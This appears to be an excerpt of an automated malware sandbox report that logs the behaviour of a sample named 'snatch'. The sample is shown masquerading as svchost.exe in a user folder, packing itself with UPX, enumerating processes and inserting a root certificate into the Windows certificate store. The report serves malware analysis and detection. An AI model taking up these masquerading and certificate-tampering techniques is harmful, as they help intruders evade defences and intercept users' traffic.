File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\dll\kernelbase.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\comctl32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\msvcrt.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\ucrtbase.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\gdiplus.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\kernel32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\user32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\msvcp_win.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\ntasn1.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\ntasn1.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\Kernel.Appcore.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\ws2_32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\gdi32full.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\gdi32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\crypt32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\user32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\gdi32full.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\sechost.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\shell32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\ncrypt.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\ws2_32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\crypt32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\gdi32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\dbghelp.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\bcryptprimitives.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\shcore.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\exe\MeshService64.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\gdi32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\ucrtbase.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\ole32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\combase.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\gdiplus.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dbgcore.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\DLL\bcrypt.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\DLL\kernel32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\BF332F71369E50D0A83473561526CDE3306995C5 C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\bcryptprimitives.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\EC2C65D3BFBACE4745E3B186972B697BD8B5F46B C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\ncrypt.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\win32u.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\msvcp_win.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\sechost.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\combase.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\ncrypt.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\kernelbase.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\DLL\kernel32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\comctl32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\rpcrt4.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\shell32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dbghelp.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\ntdll.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\msvcp_win.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\sechost.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\bcryptprimitives.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\B0B24DB435524A38C2DB25B18D0FD77582AA3B8C C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\advapi32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\crypt32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\ucrtbase.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\user32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\dbghelp.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\gdiplus.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\DLL\dbgcore.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\BF332F71369E50D0A83473561526CDE3306995C5 C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133735536335178670" C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
